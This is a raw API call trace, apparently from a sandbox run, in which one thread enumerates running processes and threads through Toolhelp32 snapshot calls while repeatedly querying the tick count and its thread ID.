	[0097.646] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0097.647] GetTickCount () returned 0x2bf9d
	[0097.647] GetCurrentThreadId () returned 0xc24
	[0097.647] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0097.648] GetTickCount () returned 0x2bf9d
	[0097.648] GetCurrentThreadId () returned 0xc24
	[0097.648] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0097.649] GetTickCount () returned 0x2bf9d
	[0097.649] GetCurrentThreadId () returned 0xc24
	[0097.649] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.650] GetTickCount () returned 0x2bf9d
	[0097.650] GetCurrentThreadId () returned 0xc24
	[0097.651] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0097.651] GetTickCount () returned 0x2bf9d
	[0097.651] GetCurrentThreadId () returned 0xc24
	[0097.652] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0097.653] GetTickCount () returned 0x2bf9d
	[0097.653] GetCurrentThreadId () returned 0xc24
	[0097.653] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0097.654] GetTickCount () returned 0x2bf9d
	[0097.654] GetCurrentThreadId () returned 0xc24
	[0097.654] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0097.655] GetTickCount () returned 0x2bfac
	[0097.655] GetCurrentThreadId () returned 0xc24
	[0097.655] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0097.656] GetTickCount () returned 0x2bfac
	[0097.656] GetCurrentThreadId () returned 0xc24
	[0097.656] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0097.657] GetTickCount () returned 0x2bfac
	[0097.657] GetCurrentThreadId () returned 0xc24
	[0097.657] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0097.658] GetTickCount () returned 0x2bfac
	[0097.658] GetCurrentThreadId () returned 0xc24
	[0097.658] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0097.659] GetTickCount () returned 0x2bfac
	[0097.659] GetCurrentThreadId () returned 0xc24
	[0097.659] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0097.660] GetTickCount () returned 0x2bfac
	[0097.660] GetCurrentThreadId () returned 0xc24
	[0097.660] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0097.661] GetTickCount () returned 0x2bfac
	[0097.661] GetCurrentThreadId () returned 0xc24
	[0097.662] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0097.663] GetTickCount () returned 0x2bfac
	[0097.663] GetCurrentThreadId () returned 0xc24
	[0097.663] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0097.664] GetTickCount () returned 0x2bfac
	[0097.664] GetCurrentThreadId () returned 0xc24
	[0097.664] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0097.665] GetTickCount () returned 0x2bfac
	[0097.665] GetCurrentThreadId () returned 0xc24
	[0097.665] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0097.666] GetTickCount () returned 0x2bfac
	[0097.666] GetCurrentThreadId () returned 0xc24
	[0097.666] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0097.667] GetTickCount () returned 0x2bfac
	[0097.667] GetCurrentThreadId () returned 0xc24
	[0097.667] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0097.668] GetTickCount () returned 0x2bfac
	[0097.668] GetCurrentThreadId () returned 0xc24
	[0097.668] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0097.669] GetTickCount () returned 0x2bfac
	[0097.669] GetCurrentThreadId () returned 0xc24
	[0097.670] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0097.699] GetTickCount () returned 0x2bfcb
	[0097.699] GetCurrentThreadId () returned 0xc24
	[0097.699] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0097.700] GetTickCount () returned 0x2bfcb
	[0097.700] GetCurrentThreadId () returned 0xc24
	[0097.700] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0097.701] GetTickCount () returned 0x2bfdb
	[0097.701] GetCurrentThreadId () returned 0xc24
	[0097.701] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0097.702] GetTickCount () returned 0x2bfdb
	[0097.702] GetCurrentThreadId () returned 0xc24
	[0097.702] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0097.703] GetTickCount () returned 0x2bfdb
	[0097.703] GetCurrentThreadId () returned 0xc24
	[0097.704] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0097.705] GetTickCount () returned 0x2bfdb
	[0097.705] GetCurrentThreadId () returned 0xc24
	[0097.705] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0xe6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0097.706] GetTickCount () returned 0x2bfdb
	[0097.706] GetCurrentThreadId () returned 0xc24
	[0097.706] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe6c, pcPriClassBase=4, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0097.707] GetTickCount () returned 0x2bfdb
	[0097.707] GetCurrentThreadId () returned 0xc24
	[0097.707] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0097.708] GetTickCount () returned 0x2bfdb
	[0097.708] GetCurrentThreadId () returned 0xc24
	[0097.708] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost3????????????????????????????????")) returned 0
	[0097.709] GetTickCount () returned 0x2bfdb
	[0097.709] Thread32First (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.710] GetCurrentThreadId () returned 0xc24
	[0097.710] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.711] GetTickCount () returned 0x2bfdb
	[0097.711] GetCurrentThreadId () returned 0xc24
	[0097.711] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.712] GetTickCount () returned 0x2bfdb
	[0097.712] GetCurrentThreadId () returned 0xc24
	[0097.712] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.713] GetTickCount () returned 0x2bfdb
	[0097.713] GetCurrentThreadId () returned 0xc24
	[0097.713] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.714] GetTickCount () returned 0x2bfdb
	[0097.714] GetCurrentThreadId () returned 0xc24
	[0097.714] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.715] GetTickCount () returned 0x2bfdb
	[0097.715] GetCurrentThreadId () returned 0xc24
	[0097.715] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.716] GetTickCount () returned 0x2bfdb
	[0097.716] GetCurrentThreadId () returned 0xc24
	[0097.716] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.717] GetTickCount () returned 0x2bfeb
	[0097.717] GetCurrentThreadId () returned 0xc24
	[0097.717] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.718] GetTickCount () returned 0x2bfeb
	[0097.718] GetCurrentThreadId () returned 0xc24
	[0097.719] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.719] GetTickCount () returned 0x2bfeb
	[0097.719] GetCurrentThreadId () returned 0xc24
	[0097.720] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.720] GetTickCount () returned 0x2bfeb
	[0097.721] GetCurrentThreadId () returned 0xc24
	[0097.721] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.722] GetTickCount () returned 0x2bfeb
	[0097.722] GetCurrentThreadId () returned 0xc24
	[0097.722] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.723] GetTickCount () returned 0x2bfeb
	[0097.723] GetCurrentThreadId () returned 0xc24
	[0097.723] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.724] GetTickCount () returned 0x2bfeb
	[0097.724] GetCurrentThreadId () returned 0xc24
	[0097.724] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.725] GetTickCount () returned 0x2bfeb
	[0097.725] GetCurrentThreadId () returned 0xc24
	[0097.725] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.726] GetTickCount () returned 0x2bfeb
	[0097.726] GetCurrentThreadId () returned 0xc24
	[0097.726] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.727] GetTickCount () returned 0x2bfeb
	[0097.727] GetCurrentThreadId () returned 0xc24
	[0097.727] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.728] GetTickCount () returned 0x2bfeb
	[0097.728] GetCurrentThreadId () returned 0xc24
	[0097.728] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.729] GetTickCount () returned 0x2bfeb
	[0097.729] GetCurrentThreadId () returned 0xc24
	[0097.729] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.730] GetTickCount () returned 0x2bfeb
	[0097.730] GetCurrentThreadId () returned 0xc24
	[0097.731] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.731] GetTickCount () returned 0x2bfeb
	[0097.731] GetCurrentThreadId () returned 0xc24
	[0097.732] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.766] GetTickCount () returned 0x2c01a
	[0097.766] GetCurrentThreadId () returned 0xc24
	[0097.766] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.767] GetTickCount () returned 0x2c01a
	[0097.767] GetCurrentThreadId () returned 0xc24
	[0097.767] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.768] GetTickCount () returned 0x2c01a
	[0097.768] GetCurrentThreadId () returned 0xc24
	[0097.768] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.769] GetTickCount () returned 0x2c01a
	[0097.769] GetCurrentThreadId () returned 0xc24
	[0097.769] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.770] GetTickCount () returned 0x2c01a
	[0097.770] GetCurrentThreadId () returned 0xc24
	[0097.771] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.772] GetTickCount () returned 0x2c01a
	[0097.772] GetCurrentThreadId () returned 0xc24
	[0097.772] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.773] GetTickCount () returned 0x2c01a
	[0097.773] GetCurrentThreadId () returned 0xc24
	[0097.773] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.774] GetTickCount () returned 0x2c01a
	[0097.774] GetCurrentThreadId () returned 0xc24
	[0097.774] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.775] GetTickCount () returned 0x2c01a
	[0097.775] GetCurrentThreadId () returned 0xc24
	[0097.775] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.776] GetTickCount () returned 0x2c01a
	[0097.776] GetCurrentThreadId () returned 0xc24
	[0097.776] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.777] GetTickCount () returned 0x2c01a
	[0097.777] GetCurrentThreadId () returned 0xc24
	[0097.777] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.778] GetTickCount () returned 0x2c01a
	[0097.778] GetCurrentThreadId () returned 0xc24
	[0097.778] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.779] GetTickCount () returned 0x2c029
	[0097.779] GetCurrentThreadId () returned 0xc24
	[0097.779] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.780] GetTickCount () returned 0x2c029
	[0097.780] GetCurrentThreadId () returned 0xc24
	[0097.780] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.781] GetTickCount () returned 0x2c029
	[0097.781] GetCurrentThreadId () returned 0xc24
	[0097.781] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.782] GetTickCount () returned 0x2c029
	[0097.782] GetCurrentThreadId () returned 0xc24
	[0097.782] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.783] GetTickCount () returned 0x2c029
	[0097.783] GetCurrentThreadId () returned 0xc24
	[0097.783] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.784] GetTickCount () returned 0x2c029
	[0097.784] GetCurrentThreadId () returned 0xc24
	[0097.784] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.785] GetTickCount () returned 0x2c029
	[0097.785] GetCurrentThreadId () returned 0xc24
	[0097.786] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.786] GetTickCount () returned 0x2c029
	[0097.786] GetCurrentThreadId () returned 0xc24
	[0097.787] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.788] GetTickCount () returned 0x2c029
	[0097.788] GetCurrentThreadId () returned 0xc24
	[0097.788] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.789] GetTickCount () returned 0x2c029
	[0097.789] GetCurrentThreadId () returned 0xc24
	[0097.789] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.790] GetTickCount () returned 0x2c029
	[0097.790] GetCurrentThreadId () returned 0xc24
	[0097.790] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.791] GetTickCount () returned 0x2c029
	[0097.791] GetCurrentThreadId () returned 0xc24
	[0097.791] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.792] GetTickCount () returned 0x2c029
	[0097.792] GetCurrentThreadId () returned 0xc24
	[0097.792] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.793] GetTickCount () returned 0x2c029
	[0097.793] GetCurrentThreadId () returned 0xc24
	[0097.793] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.794] GetTickCount () returned 0x2c029
	[0097.794] GetCurrentThreadId () returned 0xc24
	[0097.794] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.795] GetTickCount () returned 0x2c039
	[0097.795] GetCurrentThreadId () returned 0xc24
	[0097.795] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.796] GetTickCount () returned 0x2c039
	[0097.796] GetCurrentThreadId () returned 0xc24
	[0097.797] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.798] GetTickCount () returned 0x2c039
	[0097.798] GetCurrentThreadId () returned 0xc24
	[0097.798] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.799] GetTickCount () returned 0x2c039
	[0097.799] GetCurrentThreadId () returned 0xc24
	[0097.799] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.894] GetTickCount () returned 0x2c097
	[0097.894] GetCurrentThreadId () returned 0xc24
	[0097.894] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.895] GetTickCount () returned 0x2c097
	[0097.895] GetCurrentThreadId () returned 0xc24
	[0097.895] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.896] GetTickCount () returned 0x2c097
	[0097.896] GetCurrentThreadId () returned 0xc24
	[0097.896] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.897] GetTickCount () returned 0x2c097
	[0097.897] GetCurrentThreadId () returned 0xc24
	[0097.897] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.899] GetTickCount () returned 0x2c097
	[0097.899] GetCurrentThreadId () returned 0xc24
	[0097.899] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.900] GetTickCount () returned 0x2c097
	[0097.900] GetCurrentThreadId () returned 0xc24
	[0097.900] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.901] GetTickCount () returned 0x2c097
	[0097.901] GetCurrentThreadId () returned 0xc24
	[0097.901] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.902] GetTickCount () returned 0x2c097
	[0097.902] GetCurrentThreadId () returned 0xc24
	[0097.902] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.903] GetTickCount () returned 0x2c097
	[0097.903] GetCurrentThreadId () returned 0xc24
	[0097.903] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.904] GetTickCount () returned 0x2c097
	[0097.904] GetCurrentThreadId () returned 0xc24
	[0097.904] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.905] GetTickCount () returned 0x2c0a6
	[0097.905] GetCurrentThreadId () returned 0xc24
	[0097.905] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.906] GetTickCount () returned 0x2c0a6
	[0097.906] GetCurrentThreadId () returned 0xc24
	[0097.906] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.907] GetTickCount () returned 0x2c0a6
	[0097.907] GetCurrentThreadId () returned 0xc24
	[0097.907] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.908] GetTickCount () returned 0x2c0a6
	[0097.908] GetCurrentThreadId () returned 0xc24
	[0097.908] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.909] GetTickCount () returned 0x2c0a6
	[0097.909] GetCurrentThreadId () returned 0xc24
	[0097.909] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.910] GetTickCount () returned 0x2c0a6
	[0097.910] GetCurrentThreadId () returned 0xc24
	[0097.910] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.911] GetTickCount () returned 0x2c0a6
	[0097.911] GetCurrentThreadId () returned 0xc24
	[0097.911] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.912] GetTickCount () returned 0x2c0a6
	[0097.912] GetCurrentThreadId () returned 0xc24
	[0097.913] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.913] GetTickCount () returned 0x2c0a6
	[0097.913] GetCurrentThreadId () returned 0xc24
	[0097.914] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.915] GetTickCount () returned 0x2c0a6
	[0097.915] GetCurrentThreadId () returned 0xc24
	[0097.915] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.916] GetTickCount () returned 0x2c0a6
	[0097.916] GetCurrentThreadId () returned 0xc24
	[0097.916] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.917] GetTickCount () returned 0x2c0a6
	[0097.917] GetCurrentThreadId () returned 0xc24
	[0097.917] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.918] GetTickCount () returned 0x2c0a6
	[0097.918] GetCurrentThreadId () returned 0xc24
	[0097.918] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.919] GetTickCount () returned 0x2c0a6
	[0097.919] GetCurrentThreadId () returned 0xc24
	[0097.919] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.920] GetTickCount () returned 0x2c0b6
	[0097.920] GetCurrentThreadId () returned 0xc24
	[0097.920] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.921] GetTickCount () returned 0x2c0b6
	[0097.921] GetCurrentThreadId () returned 0xc24
	[0097.921] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.922] GetTickCount () returned 0x2c0b6
	[0097.922] GetCurrentThreadId () returned 0xc24
	[0097.922] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.923] GetTickCount () returned 0x2c0b6
	[0097.923] GetCurrentThreadId () returned 0xc24
	[0097.923] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.924] GetTickCount () returned 0x2c0b6
	[0097.924] GetCurrentThreadId () returned 0xc24
	[0097.924] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.925] GetTickCount () returned 0x2c0b6
	[0097.925] GetCurrentThreadId () returned 0xc24
	[0097.925] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.926] GetTickCount () returned 0x2c0b6
	[0097.926] GetCurrentThreadId () returned 0xc24
	[0097.926] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.927] GetTickCount () returned 0x2c0b6
	[0097.927] GetCurrentThreadId () returned 0xc24
	[0097.927] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.986] GetTickCount () returned 0x2c0f4
	[0097.986] GetCurrentThreadId () returned 0xc24
	[0097.986] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.987] GetTickCount () returned 0x2c0f4
	[0097.987] GetCurrentThreadId () returned 0xc24
